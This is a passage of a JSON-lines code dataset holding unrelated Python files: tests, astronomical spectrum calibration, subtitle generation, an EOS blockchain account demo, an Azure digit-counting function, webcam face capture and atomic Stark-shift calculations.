cls.xs1.elements['vehicles'].type.content_type[1]\n\n def test_absolute_path(self):\n url1 = \"https://example.com/xsd/other_schema.xsd\"\n self.assertTrue(xmlschema.normalize_url(url1, base_url=\"/path_my_schema/schema.xsd\") == url1)\n\n def test_fetch_resource(self):\n wrong_path = os.path.join(self.test_dir, 'examples/resources/issue017.txt')\n self.assertRaises(xmlschema.XMLSchemaURLError, xmlschema.fetch_resource, wrong_path)\n right_path = os.path.join(self.test_dir, 'examples/resources/issue 017.txt')\n self.assertTrue(xmlschema.fetch_resource(right_path).endswith('e%20017.txt'))\n\n\nif __name__ == '__main__':\n from xmlschema.tests import print_test_header\n\n print_test_header()\n unittest.main()\n","sub_path":"xmlschema/tests/test_resources.py","file_name":"test_resources.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"318139449","text":"def calibrate(objectlist,gratcode,secondord,gratcode2):\n from astropy.io import fits\n import numpy as np\n from tmath.wombat.getmswave import getmswave\n from tmath.wombat.womscipyrebin import womscipyrebin\n from tmath.pydux.obs_extinction import obs_extinction\n #extinction terms from Allen, 3rd edition\n extwave= [2400.,2600.,2800.,3000.,3200.,3400.,3600.,3800., \\\n 4000.,4500.,5000.,5500.,6000.,6500.,7000.,8000., \\\n 9000.,10000.,12000.,14000.]\n extvals=[68.0,89.0,36.0,4.5,1.30,0.84,0.68,0.55,0.46,0.31, \\\n 0.23,0.195,0.170,0.126,0.092,0.062,0.048,0.039, \\\n 0.028,0.021]\n fluxfits=fits.open('fluxstar'+gratcode+'.fits')\n fluxstar=fluxfits[0].data\n fluxhead=fluxfits[0].header\n fluxwavezero=float(fluxhead['CRVAL1'])\n fluxwavedelt=float(fluxhead['CDELT1'])\n fluxwave=np.arange(len(fluxstar))*fluxwavedelt+fluxwavezero\n fluxairmass=float(fluxhead['AIRMASS'])\n fluxname=fluxhead['OBJECT']\n try:\n fluxnum=int(fluxhead['OBSNUM'])\n except KeyError:\n fluxnum=0\n if (secondord):\n fluxfits2=fits.open('fluxstar'+gratcode2+'.fits')\n fluxstar2=fluxfits[0].data\n fluxhead2=fluxfits[0].header\n fluxwavezero2=float(fluxhead2['CRVAL1'])\n fluxwavedelt2=float(fluxhead2['CDELT1'])\n fluxwave2=np.arange(len(fluxstar2))*fluxwavedelt2+fluxwavezero2\n fluxairmass2=float(fluxhead2['AIRMASS'])\n fluxname2=fluxhead2['OBJECT']\n try:\n fluxnum2=int(fluxhead2['OBSNUM'])\n except KeyError:\n fluxnum2=0\n observat=fluxhead['OBSERVAT'].strip().lower()\n sitefactor=obs_extinction(observat)\n infile=open(objectlist,'r')\n for msfile in infile:\n msfile=msfile.strip()\n if ('.fits' not in msfile):\n msfile=msfile+'.fits'\n multifits=fits.open(msfile)\n multispec=multifits[0].data\n mshead=multifits[0].header\n objectname=mshead['OBJECT']\n print('The object is: {}'.format(objectname))\n airmass=float(mshead['AIRMASS'])\n exptime=float(mshead['EXPTIME'])\n if (exptime < 1):\n exptime=1.0\n num_apertures=multispec.shape[1]\n num_bands=multispec.shape[0]\n wavearr=np.zeros((multispec.shape[2],multispec.shape[1]))\n if (secondord):\n multispec2=multispec.copy()\n mshead2=mshead.copy()\n for i in range(0,num_apertures):\n print('\\nAperture {}:'.format(i+1))\n wave=getmswave(mshead,i)\n extinction=womscipyrebin(extwave,extvals,wave)\n extfactor=np.exp(extinction*sitefactor*airmass)\n fluxstartmp=womscipyrebin(fluxwave,fluxstar,wave)\n wdelt=wave[1]-wave[0]\n for j in range(0,num_bands):\n multispec[j,i,:]=multispec[j,i,:]*extfactor #extinction\n multispec[j,i,:]=multispec[j,i,:]/fluxstartmp #flux\n multispec[j,i,:]=multispec[j,i,:]/exptime #adjust to time\n multispec[j,i,:]=multispec[j,i,:]*10**(-19.44) #AB->fnu\n multispec[j,i,:]=multispec[j,i,:]*2.99792458e18/wave/wave #fnu->flm\n if (secondord):\n fluxstartmp2=womscipyrebin(fluxwave2,fluxstar2,wave)\n for j in range(0,num_bands):\n multispec2[j,i,:]=multispec2[j,i,:]*extfactor #extinction\n multispec2[j,i,:]=multispec2[j,i,:]/fluxstartmp #flux\n multispec2[j,i,:]=multispec2[j,i,:]/exptime #adjust to time\n multispec2[j,i,:]=multispec2[j,i,:]*10**(-19.44) #AB->fnu\n multispec2[j,i,:]=multispec2[j,i,:]*2.99792458e18/wave/wave #fnu->flm\n msfile='c'+gratcode+msfile\n mshead.set('FLUX_Z',fluxairmass,'airmass of flux standard')\n mshead.set('FLUX_NUM',fluxnum,'obsnum of flux standard')\n mshead.set('FLUX_OBJ',fluxname,'id of flux standard')\n outhdu=fits.PrimaryHDU(multispec)\n hdul=fits.HDUList([outhdu])\n hdul[0].header=mshead.copy()\n hdul.writeto(msfile,overwrite=True)\n hdul.close()\n if (secondord):\n msfile='c'+gratcode2+msfile\n mshead2.set('FLX2_Z',fluxairmass,'airmass of flux second ord. standard')\n mshead2.set('FLX2_NUM',fluxnum,'obsnum of flux second ord. standard')\n mshead2.set('FLX2_OBJ',fluxname,'id of flux second ord. standard')\n outhdu=fits.PrimaryHDU(multispec2)\n hdul=fits.HDUList([outhdu])\n hdul[0].header=mshead2.copy()\n hdul.writeto(msfile2,overwrite=True)\n hdul.close()\n\n infile.close()\n fluxfits.close()\n if (secondord):\n fluxfits2.close()\n print('calibrate')\n print(objectlist,gratcode,secondord,gratcode2)\n return\n\n","sub_path":"spectral_reduction/tmath/pydux/calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"7084997","text":"def grid_land(_list, i=0, f=0, empty_list=[], adj_m=[]):\n if i < len(_list):\n\n while f < len(_list):\n\n x_value = _list[i] - _list[f]\n y_value = _list[i + 1] - _list[f + 1]\n\n if x_value < 0:\n x_value = int(x_value / -1)\n\n if y_value < 0:\n y_value = int(y_value / -1)\n\n weight = x_value + y_value\n\n if weight == 0:\n empty_list.append(-1)\n\n else:\n empty_list.append(weight)\n f = f + 2\n\n\n adj_m.append(empty_list)\n grid_land(_list, i + 2, 0, [], adj_m)\n\n else:\n graph(adj_m)\n\n\n\ndef graph(adj_m):\n\n print(adj_m)\n ticked = [0]\n total = 0\n\n # going through the visited columns\n for column in range(0, len(adj_m) - 1):\n\n min_val = 99999\n\n\n # if the column is not ticked skip column\n\n if column not in ticked:\n continue\n\n # going through each ticked column\n row = 0\n for y in adj_m[column]:\n\n # finding min value and its row\n if row in ticked:\n row += 1\n continue\n\n if 0 < y < min_val:\n min_val = y\n del_row = row\n row += 1\n\n ticked.append(del_row)\n total = total + min_val\n\n print(total)\n\n\n\ngrid_land([3, 6, 7, 9, 4, 4, 1, 7, 8, 2])\n","sub_path":"gridland4.py","file_name":"gridland4.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"521406556","text":"import os\nimport librosa\nimport pysrt\nfrom pysrt import SubRipTime\nimport sys\nfrom pathlib import Path\nimport re\nfrom datetime import timedelta\nimport chardet\nfrom moviepy.editor import *\n\nimport numpy as np\n\nfrom ffmpeg import Transcode\n\nclass Media:\n \"\"\"\n The Media class represents a media file to be retrieved and analyzed\n \"\"\"\n\n # Supported media formats\n FORMATS = ['.mkv', '.mp4', '.wmv', '.avi', '.flv']\n\n # The frequency of the generated audio\n FREQ = 16000\n\n # The number of coefficients to extract from the mfcc\n N_MFCC = 13\n\n # The number of samples in each mfcc coefficient\n HOP_LEN = 512.0\n\n # The length (seconds) of each item in the mfcc analysis\n LEN_MFCC = HOP_LEN/FREQ\n\n def __init__(self, filepath, subtitles=None, WPS=5):\n prefix, ext = os.path.splitext(filepath)\n if ext == '.srt':\n return self.from_srt(filepath)\n if ext == '.txt':\n return self.from_txt(filepath)\n if not ext:\n raise ValueError(f'Unknown file: \"{filepath}\"')\n if ext not in Media.FORMATS:\n raise ValueError(f'Filetype {ext} not supported: \"{filepath}\"')\n self.__subtitles = subtitles\n self.filepath = os.path.abspath(filepath)\n self.filename = os.path.basename(prefix)\n self.extension = ext\n self.offset = timedelta()\n self.WPS = WPS # Words (spoken) per second\n \n def from_srt(self, filepath):\n prefix, ext = os.path.splitext(filepath)\n if ext != 'srt':\n raise ValueError('Filetype must be .srt')\n prefix = os.path.basename(re.sub(r'\\.\\w\\w$', '', prefix))\n dir = os.path.dirname(filepath)\n for f in os.listdir(dir):\n _, ext = os.path.splitext(f)\n if f.startswith(prefix) and ext in Media.FORMATS:\n return self.__init__(os.path.join(dir, f), subtitles=[filepath])\n raise ValueError(f'No media for subtitle: \"{filepath}\"')\n\n def from_txt(self, filepath):\n prefix, ext = os.path.splitext(filepath)\n if ext != '.txt':\n raise ValueError('Filetype must be .txt')\n prefix = os.path.basename(re.sub(r'\\.\\w\\w$', '', prefix))\n dir = os.path.dirname(filepath)\n for f in os.listdir(dir):\n _, ext = os.path.splitext(f)\n if prefix in f and ext in Media.FORMATS:\n return self.__init__(os.path.join(dir, f), subtitles=[filepath])\n raise ValueError(f'No media for subtitle: \"{filepath}\"')\n \n def subtitles(self):\n if self.__subtitles is not None:\n for s in self.__subtitles:\n yield(Text(self, s))\n else:\n dir = os.path.dirname(self.filepath)\n for f in os.listdir(dir):\n if '.txt' in f and self.filename in f:\n yield(Text(self, os.path.join(dir, f)))\n\n def mfcc(self, duration=60*15, seek=True):\n transcode = Transcode(self.filepath, duration=duration, seek=seek)\n self.offset = transcode.start\n print('Transcoding...')\n transcode.run()\n y, sr = librosa.load(transcode.output, sr=Media.FREQ)\n self.mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=int(Media.HOP_LEN), n_mfcc=int(Media.N_MFCC))\n clip = AudioFileClip(transcode.output)\n self.dur = clip.duration\n os.remove(transcode.output)\n return self.mfcc\n\nclass Subtitle:\n \"\"\"\n Subtitle class represents a .srt file on the disk and provides the functionality to inspect and manipulate the contents\n \"\"\"\n\n def __init__(self, media, path):\n self.media = media\n self.path = path\n self.subs = pysrt.open(self.path)\n\n def srt_to_transcript(self):\n filename, _ = os.path.splitext(self.path)\n subs = pysrt.open(self.path)\n with open(f'{filename}.txt', 'w+') as f:\n for sub in subs:\n f.write(f'{sub.text}\\n')\n\n\nclass Text:\n \"\"\"\n Text class reads .txt file and converts it to .srt\n \"\"\"\n\n def __init__(self, media, path):\n self.media = media\n self.path = path\n self.lines = open(self.path)\n \n def determine_speech(self, model):\n print('determine')\n mfcc = self.media.mfcc.T\n mfcc = mfcc[..., np.newaxis]\n y_pred = model.predict(mfcc)\n y_pred = y_pred.reshape(-1,)\n num_chunks = round(len(y_pred)/self.media.dur)\n chunks = [ y_pred[i:i+num_chunks] for i in range(0, len(y_pred), num_chunks) ]\n self.__secs = [ round(sum(i)/len(i)) for i in chunks ]\n return self.__secs\n\n def to_srt(self):\n print('before')\n with open(self.path) as f:\n text = f.read()\n text = text.replace('\\n\\n', '\\n').split('\\n')\n\n with open(f'static/{self.media.filename}.srt', 'w+') as f: # creating a new srt file\n print(f'{self.media.filename}.srt')\n print('Creating srt...')\n num = 1\n times = []\n\n for i, value in enumerate(self.__secs, start=0):\n if i > 1 and i < len(text):\n num_words = len(text[i-1].split(' '))\n if num_words > self.media.WPS:\n continue\n if value == 1:\n sec = i\n times.append(sec)\n\n for i, time in enumerate(times):\n num_words = len(text[i].split(' '))\n if num_words > self.media.WPS:\n add = 2\n else:\n add = 1\n if not text[i+1]:\n print(i, text[i])\n break\n if time > 3600:\n hours = time // 3600\n else:\n hours = 0\n mins = (time - hours*3600) // 60\n secs = (time - hours*3600) % 60\n print(f'{num}\\n{hours:02}:{mins:02}:{secs:02},000 --> {hours:02}:{mins:02}:{secs+add:02},000\\n{text[i]}\\n\\n')\n f.write(f'{num}\\n{hours:02}:{mins:02}:{secs:02},000 --> {hours:02}:{mins:02}:{secs+add:02},000\\n{text[i]}\\n\\n')\n num += 1\n \n self.media.srt = f'output/new_{self.media.filename}.srt'\n return self.media.srt\n\n def to_vtt(self):\n print('before')\n with open(self.path) as f:\n text = f.read()\n text = text.replace('\\n\\n', '\\n').split('\\n')\n\n with open(f'static/{self.media.filename}.vtt', 'w+') as f: # creating a new vtt file\n f.write('WEBVTT\\nKind: subtitles\\nLanguage: en')\n print(f'{self.media.filename}.vtt')\n print('Creating vtt...')\n num = 1\n times = []\n\n for i, value in enumerate(self.__secs, start=0):\n if i > 1 and i < len(text):\n num_words = len(text[i-1].split(' '))\n if num_words > self.media.WPS:\n continue\n if value == 1:\n sec = i\n times.append(sec)\n\n for i, time in enumerate(times):\n num_words = len(text[i].split(' '))\n if num_words > self.media.WPS:\n add = 2\n else:\n add = 1\n if not text[i+1]:\n print(i, text[i])\n break\n if time > 3600:\n hours = time // 3600\n else:\n hours = 0\n mins = (time - hours*3600) // 60\n secs = (time - hours*3600) % 60\n print(f'{num}\\n{hours:02}:{mins:02}:{secs:02}.000 --> {hours:02}:{mins:02}:{secs+add:02}.000\\n{text[i]}\\n\\n')\n f.write(f'{num}\\n{hours:02}:{mins:02}:{secs:02}.000 --> {hours:02}:{mins:02}:{secs+add:02}.000\\n{text[i]}\\n\\n')\n num += 1\n \n self.media.vtt = f'static/{self.media.filename}.vtt'\n return self.media.vtt\n\n\n# Convert timestamp to seconds\ndef timeToSec(t):\n total_sec = float(t.milliseconds)/1000\n total_sec += t.seconds\n total_sec += t.minutes*60\n total_sec += t.hours*60*60\n return total_sec\n\n# Return timestamp from cell position\ndef timeToPos(t, freq=Media.FREQ, hop_len=Media.HOP_LEN):\n return round(timeToSec(t)/(hop_len/freq))\n\n\ndef secondsToBlocks(s, hop_len=Media.HOP_LEN, freq=Media.FREQ):\n return int(float(s)/(hop_len/freq))\n\n\ndef blocksToSeconds(h, freq=Media.FREQ, hop_len=Media.HOP_LEN):\n return float(h)*(hop_len/freq)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":7816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293709864","text":"import setup\nimport teos\nimport cleos\nimport eosf\nimport unittest\nfrom termcolor import colored, cprint\nimport time\n\nsetup.set_json(False) \nsetup.set_verbose(True)\nsetup.use_keosd(False)\n\ncprint(\"\"\"\nTesting `eosf.account()`.\n\n`eosf.account()` is a factory: depending on parameters, it returns the same \nobject, representing an EOSIO account functionality, yet build in many ways:\n\n -- with the `cleos create account` command;\n -- with the `cleos system newaccount` command;\n -- it can be one restored from the blockchain.\n\"\"\", 'magenta')\n\n\ndef test():\n global account_alice\n global account_carol\n global account_master\n global account_bill\n global account_test\n\n cprint(\"\"\"\nStart session: reset the local EOSIO node, create a wallet object, put the\nmaster account into it.\n \"\"\", 'magenta')\n\n reset = eosf.reset()\n account_master = eosf.AccountMaster()\n wallet = eosf.Wallet()\n wallet.import_key(account_master)\n return\n cprint(\"\"\"\nCreate an account object, named `account_alice`, with the `eosf.account()`, \nwith default parameters: \n\n -- using the `account_master` as the creator;\n -- using a random 12 character long name;\n -- using internally created `owner` and `active` keys.\n \"\"\", 'magenta')\n\n account_alice = eosf.account()\n wallet.import_key(account_alice)\n\n account_carol = eosf.account()\n wallet.import_key(account_carol)\n\n cprint(\"\"\"\nThe following `account_bill` object represents the account of the name `bill`\n \"\"\", 'magenta')\n\n account_bill = eosf.account(name=\"bill\")\n wallet.import_key(account_bill)\n\n account_test = eosf.account()\n wallet.import_key(account_test)\n\n cprint(\"\"\"\nThe last account `account_test` is going to take a contract. Now, it does not have\nany:\n \"\"\", 'magenta')\n\n account_test.code()\n\n cprint(\"\"\"\nDefine a contract, with its code specified in the EOS repository \n(build/contracts/eosio.token), and deploy it:\n \"\"\", 'magenta')\n\n contract_test = eosf.Contract(account_test, \"eosio.token\")\n deploy = contract_test.deploy()\n account_test.code()\n\n time.sleep(1)\n\n action = account_test.push_action(\n \"create\", \n '{\"issuer\":\"' \n + str(account_master) \n + '\", \"maximum_supply\":\"1000000000.0000 EOS\", \\\n \"can_freeze\":0, \"can_recall\":0, \"can_whitelist\":0}')\n\n action = contract_test.push_action(\n \"issue\", \n '{\"to\":\"' + str(account_alice)\n + '\", \"quantity\":\"100.0000 EOS\", \"memo\":\"memo\"}', \\\n account_master)\n \n cprint(\"\"\"\nExperiments with the `eosio.token` contract are shown elsewere. \nHere, we show how the session accounts recover after restarting \nthe session.\n \"\"\", 'magenta')\n\n account_alice = None\n account_bill = None\n account_carol = None\n account_test = None\n contract_test = None\n wallet = None\n\n wallet = eosf.Wallet()\n\n cprint(\"\"\"\nThe old wallet is restored. It is possible, because there is a password map \nin the wallet directory. \n\nNote that this provision is available only if the `keosd` Wallet Manager is not \nused and wallets are managed by the local node - this condition is set with the\n`setup.use_keosd(False)` statement above.\n \"\"\", 'magenta')\n\n wallet.restore_accounts(globals())\n print(account_alice.info())\n\n cprint(\"\"\"\nContinue operations on the restored account objects:\n \"\"\", 'magenta')\n\n action = account_test.push_action(\n \"transfer\", \n '{\"from\":\"' \n + str(account_alice)\n + '\", \"to\":\"' + str(account_carol)\n + '\", \"quantity\":\"25.0000 EOS\", \"memo\":\"memo\"}', \n account_alice)\n\n cprint(\"\"\"\nNote that the accounts have to be declared global, in order to be \nrestorable with the current means.\n \"\"\", 'magenta')\n\n\nif __name__ == \"__main__\":\n test()","sub_path":"pyteos/tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"395542671","text":"import json\nimport logging\nimport string\n\nimport azure.functions as func\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(f'Start Count word Function')\n result = {\n 'values':[]\n }\n try:\n logging.info('trying to get request body')\n record_list = req.get_json().get('values')\n for record in record_list:\n res_record ={\n 'recordId': record['recordId'],\n 'data':{\n 'digit_count':None\n },\n 'errors': None, \n 'warnings': None\n }\n try:\n text = record['data']['text']\n if text is not None:\n text = ''.join([w for w in text if not w in string.punctuation])\n counter = 0\n for w in text.split():\n if w.isdigit():\n counter += 1\n # add count to a record\n res_record['data']['digit_count'] = counter\n else:\n res_record[\"warnings\"] = [ { \"message\": \"This record doesn't have content\"} ]\n\n except Exception as e:\n logging.exception(\"failed when counting digit\")\n res_record[\"errors\"] = [ { \"message\": f\"{e}\"} ]\n \n result['values'].append(res_record)\n return func.HttpResponse(\n json.dumps(result,indent=4),\n mimetype=\"application/json\",\n status_code=200\n )\n\n except Exception as e:\n logging.exception(\"failed to get body from request\")\n return func.HttpResponse(\n \"Content is invalid format\",\n status_code=400\n )\n","sub_path":"digitcount/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"225325247","text":"num_dict = {}\nfor i in range(100, 3001):\n start_item = i\n i = list(bin(i).replace(\"0b\", \"\"))\n for j in range(len(i) - 1):\n if i[j] == \"1\":\n i[j] = \"0\"\n break\n i = \"\".join(i)\n diff = start_item - int(i, 2)\n if not num_dict.get(diff):\n num_dict[diff] = True\n\nprint(len(num_dict))\n","sub_path":"5_task/5_17370/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"232627352","text":"# Commands --------------------------------------------------------------------------------\n\n# python roi_capture.py\n\n# Import libraries ------------------------------------------------------------------------\n\nimport numpy as np\nimport cv2\nimport os\nimport time\n\n# Initialization --------------------------------------------------------------------------\n\n# Get data file name\nuser_name = input(\"Enter name: \")\nos.mkdir(\"./capture_output/\" + user_name)\n\n\n# loads caffe face detector\nprint(\"[INFO] loading face detector...\")\nnet = cv2.dnn.readNetFromCaffe(\"face_detector/deploy.prototxt\",\n \"face_detector/res10_300x300_ssd_iter_140000.caffemodel\")\n\n# Initialize video feed with warm up period\nprint(\"[INFO] starting video stream...\")\nvs = cv2.VideoCapture(0)\ntime.sleep(2.0)\n\n# Camera ----------------------------------------------------------------------------------\n\nimg_num = 0\nwhile True:\n # Capture and resize video feed\n ret, frame = vs.read()\n\n # Convert frame to blob type\n h = frame.shape[0]\n w = frame.shape[1]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,\n (300, 300), (104.0, 177.0, 123.0))\n\n # Have the NN analyze the blob\n net.setInput(blob)\n detections = net.forward()\n\n # Kill all windows on ESC keypress\n key = cv2.waitKey(20)\n\n box = []\n for i in range(0, 1):\n # Determine prediction confidence\n confidence = detections[0, 0, i, 2]\n\n # Filter poor detections\n if confidence > .7:\n # Compute ROI coordinates\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # Make sure ROI is in frame\n startX = max(0, startX)\n startY = max(0, startY)\n endX = min(w, endX)\n endY = min(h, endY)\n\n # Pre-process the ROI data\n face = frame[startY:endY, startX:endX]\n\n # Draw box and confidence label\n cv2.rectangle(frame, (startX, startY), (endX, endY),\n (0, 0, 255), 2)\n\n # Wait for user to press SPACE\n if key == 32:\n img_name = \"{name}_{num}.png\".format(num=img_num, name=user_name)\n img_path = \"./capture_output/\" + user_name + \"/\" + img_name\n cv2.imwrite(img_path, face)\n print(\"[INFO] \" + img_name + \" saved in ./capture_output/\" + user_name)\n img_num += 1\n\n # Show the drawn frame, DFT amd ROI\n cv2.imshow(\"Camera\", frame)\n\n # Exit on ESC\n if key == 27:\n print(\"[INFO] Closing capture...\")\n break\ncv2.destroyAllWindows()\nvs.release()\n","sub_path":"roi_capture.py","file_name":"roi_capture.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"442186707","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nfrom math import factorial \r\nfrom matplotlib.ticker import AutoLocator\r\nfrom AtomFieldInt_V3 import atom, dipole\r\n\r\n# global constants:\r\nc = 2.99792458e8 # speed of light in m/s\r\neps0 = 8.85419e-12 # permittivity of free space in m^-3 kg^-1 s^4 A^2\r\nh = 6.6260700e-34 # Planck's constant in m^2 kg / s\r\nhbar = 1.0545718e-34 # reduced Planck's constant in m^2 kg / s\r\na0 = 5.29177e-11 # Bohr radius in m\r\ne = 1.6021766208e-19 # magnitude of the charge on an electron in C\r\nme = 9.10938356e-31 # mass of an electron in kg\r\nkB = 1.38064852e-23 # Boltzmann's constant in m^2 kg s^-2 K^-1\r\namu = 1.6605390e-27 # atomic mass unit in kg\r\nEh = me * e**4 /(4. *np.pi *eps0 *hbar)**2 # the Hartree energy\r\nau = e**2 * a0**2 / Eh # atomic unit for polarisability\r\n# note that atomic unit au = 4 pi eps0 a0^3\r\n\r\n#############################\r\n\r\n##### example functions:#####\r\n\r\n#############################\r\n \r\ndef getMagicWavelengths(deltaE, E, wavelengths):\r\n \"\"\"Find the magic wavelengths where the energy difference is zero.\r\n Define this where the fractional difference |deltaE/E| < 0.05 and the \r\n difference deltaE changes sign\"\"\"\r\n\r\n magicWavelengths = []\r\n magicindexes = np.where(abs(deltaE/E)<0.05)[0]\r\n \r\n for mi in magicindexes:\r\n if np.sign(deltaE[mi]) == -np.sign(deltaE[mi+1]):\r\n magicWavelengths.append(wavelengths[mi])\r\n \r\n return magicWavelengths\r\n \r\ndef plotStarkShifts(ATOM1 = atom(atm = 'Rb87'),ATOM2 = atom(atm = 'Cs133'), wavelength = 880e-9, # laser wavelength in nm\r\n beamwaist = 1e-6, # beam waist in m\r\n power = 20e-3): # power in Watts\r\n \"\"\"Find the ac Stark Shifts in Rb, Cs\"\"\"\r\n # typical optical tweezer parameters:\r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n\r\n # mass, (L,J,F,MF), bprop, dipole matrix elements (Cm), resonant frequencies (rad/s),\r\n # linewidths (rad/s), state labels, nuclear spin, atomic symbol.\r\n Rb5S = dipole(ATOM1, (0,1/2.,1,1), bprop)\r\n \r\n Rb5P = dipole(ATOM1, (1,3/2.,1,1), bprop)\r\n \r\n Cs6S = dipole(ATOM2, (0,1/2.,3,3), bprop)\r\n \r\n Cs6P = dipole(ATOM2, (1,3/2.,3,3), bprop)\r\n \r\n # need a small spacing to resolve the magic wavelengths - so it will run slow\r\n # to resolve magic wavelengths, take about 10,000 points.\r\n wavels = np.linspace(700e-9, 1100e-9, 500) \r\n \r\n # ac Stark Shift in Joules:\r\n dE6S = Cs6S.acStarkShift(0,0,0,wavels, mj=0.5, HF=False)\r\n # average over mj states\r\n dE6P = 0.5*(Cs6P.acStarkShift(0,0,0,wavels, mj=1.5, HF=False) + \r\n Cs6P.acStarkShift(0,0,0,wavels, mj=0.5, HF=False))\r\n dif6P = dE6P - dE6S\r\n \r\n magic6P = getMagicWavelengths(dif6P, dE6P, wavels)\r\n \r\n plt.figure()\r\n plt.title(\"AC Stark Shift in $^{133}$Cs\")\r\n plt.plot(wavels*1e9, dE6S/h*1e-6, 'b--', label='Ground S$_{1/2}$')\r\n plt.plot(wavels*1e9, dE6P/h*1e-6, 'r-.', label='Excited P$_{3/2}$')\r\n plt.plot(wavels*1e9, (dif6P)/h*1e-6, 'k', label='Difference')\r\n plt.plot([magic6P[0]*1e9]*2, [min(dif6P/h/1e6),max(dif6P/h/1e6)], 'm:',\r\n label = 'Magic Wavelength')\r\n plt.legend()\r\n for mw in magic6P[1:]:\r\n plt.plot([mw*1e9]*2, [min(dif6P/h/1e6),max(dif6P/h/1e6)], 'm:')\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n plt.ylim(-2200,2200)\r\n plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n plt.show()\r\n print(\"Magic wavelengths at:\\n\", magic6P)\r\n \r\n \r\n # ac Stark Shift in Joules:\r\n dE5S = Rb5S.acStarkShift(0,0,0,wavels, mj=0.5, HF=False)\r\n # average over mj states\r\n dE5P = 0.5*(Rb5P.acStarkShift(0,0,0,wavels, mj=1.5, HF=False) + \r\n Rb5P.acStarkShift(0,0,0,wavels, mj=0.5, HF=False))\r\n dif5P = dE5P - dE5S\r\n\r\n plt.figure()\r\n plt.title(\"AC Stark Shift in $^{87}$Rb\")\r\n plt.plot(wavels*1e9, dE5S/h*1e-6, 'b--', label='Ground S$_{1/2}$')\r\n plt.plot(wavels*1e9, dE5P/h*1e-6, 'r-.', label='Excited P$_{3/2}$')\r\n plt.plot(wavels*1e9, (dif5P)/h*1e-6, 'k', label='Difference')\r\n plt.legend()\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylim(-500,500)\r\n plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n plt.show()\r\n \r\ndef compareArora():\r\n \"\"\"Plot Fig. 5 - 8 in Arora et al 2007 to show that the polarisabilities \r\n of Rb and Cs without hyperfine levels are correct\"\"\"\r\n # beam properties: wavelength, power, beam waist\r\n # intensity set to 1e10 MW/cm^2\r\n bprop = [1064e-9, np.pi*0.5e-2, 1e-6]\r\n \r\n for ATOM in [atom(atm = 'Rb87'), atom(atm = 'Cs133')]:\r\n if ATOM.X == 'Rb87':\r\n wavel1 = np.linspace(780, 800, 200)*1e-9\r\n Ylim1 = (-8000, 8000)\r\n wavel2 = np.linspace(787,794, 200)*1e-9 \r\n Ylim2 = (-1000, 1000)\r\n FS, FP = 1, 3\r\n elif ATOM.X == 'Cs133':\r\n wavel1 = np.linspace(925, 1000, 200)*1e-9\r\n Ylim1 = (-1000, 5000)\r\n wavel2 = np.linspace(927, 945, 200)*1e-9\r\n Ylim2 = (-100, 100)\r\n FS, FP = 3, 5\r\n \r\n S = dipole(ATOM, (0,1/2.,FS,FS), bprop)\r\n \r\n P3 = dipole(ATOM, (1,3/2.,FP,FP), bprop)\r\n \r\n # compare polarisability of excited states\r\n plt.figure()\r\n plt.title(\"Polarisability of \"+ATOM.X)\r\n plt.plot(wavel1*1e9, S.polarisability(wavel1)/au, 'r', label='s')\r\n plt.plot(wavel1*1e9, P3.polarisability(wavel1,mj=0.5)/au, 'g--', label='p$_{3/2}$, mj=1/2')\r\n plt.plot(wavel1*1e9, P3.polarisability(wavel1,mj=1.5)/au, 'm:', label='p$_{3/2}$, mj=3/2')\r\n plt.legend()\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Polarisability (a.u.)\")\r\n plt.ylim(Ylim1)\r\n plt.xlim(wavel1[0]*1e9, wavel1[-1]*1e9)\r\n \r\n # calculate stark shifts between F, MF states\r\n mfLS = ['r', 'g--', 'm:', 'c-.', 'k-.', 'y'] # line styles\r\n plt.figure()\r\n plt.title(\"AC Stark Shifts for transitions from P$_{3/2}$ m$_F$ to \\nthe groundstate in \"+ATOM.X)\r\n dES = S.acStarkShift(0,0,0, wavel2, HF=True) # ground state stark shift\r\n for MF in range(FP+1):\r\n P3.MF = MF\r\n dEPMF = P3.acStarkShift(0,0,0, wavel2, HF=True) # excited MF state stark shift\r\n plt.plot(wavel2*1e9, (dEPMF - dES)/h/1e6, mfLS[MF], label=r'm$_F$ = $\\pm$'+str(MF))\r\n xlims = [wavel2[0]*1e9, wavel2[-1]*1e9]\r\n plt.plot(xlims, [0,0], 'k:', alpha=0.4) # show where zero is\r\n 